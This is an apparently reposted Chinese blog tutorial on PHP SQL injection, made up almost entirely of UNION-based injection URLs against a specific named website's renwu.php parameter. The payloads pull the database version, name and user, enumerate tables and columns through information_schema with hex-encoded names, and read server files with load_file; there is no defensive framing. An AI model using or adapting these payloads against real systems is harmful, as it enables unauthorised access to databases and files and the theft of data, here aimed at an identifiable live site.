zoukankan      html  css  js  c++  java
  • PHP注入实例详细教程

    #################################################################################
    #
    # PHP高级注入实例
    # Home:        www.dis9.com
    #
    #################################################################################


    -----------------------------------系统信息-------------------------------------------
    http://www.52aysc.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.52aysc.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.52aysc.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5


    --------------------------------爆数据库的表-------------------------------------------------
    http://www.52aysc.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1--          /0x61797363是爆出的数据库aysc(database())的16进制 爆出位置0的表 注意从0开始
    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××


    http://www.52aysc.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1--         /爆出位置2的表

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.52aysc.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1--         /爆出位置10的表


    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    -------------------------------爆出字段-------------------------------------------------------------
    http://www.52aysc.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 limit 1--     /0x6364625f696d6167657479706573是选择一个表    0x61797363是数据库账户 16进制
    //爆出含有多少字段

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××


    http://www.52aysc.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1--
    //爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 0 位置 的字段   (必须转换16进制)

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    http://www.52aysc.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1--

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    //爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 1 位置 的字段   (必须转换16进制)

    -----------------------------爆出数据数据----------------------------------------------------------------

    联合查询
    这个哥哥不说了

    -----------------------------跨库?得到数据库账户?--------------
    参考我的教程 php注入爆数据库账户
    http://u.115.com/file/f86e56c2cb

    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

    -----------------------------读数据文件--------------
    /renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 --


    ××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××


  • 相关阅读:
    java笔记使用线程池优化多线程编程
    java笔记查看和修改线程名称
    java笔记查看和修改线程的优先级
    java笔记策略模式和简单工厂模式
    java笔记用ThreadLocal管理线程,Callable<V>接口实现有返回值的线程
    java笔记枚举总结与详解
    java笔记关于克隆技术
    java笔记反射机制之基础总结与详解
    java笔记使用事件分配线程更新Swing控件
    java笔记关于int和byte[]的转换
  • 原文地址:https://www.cnblogs.com/swane/p/2003142.html
Copyright © 2011-2022 走看看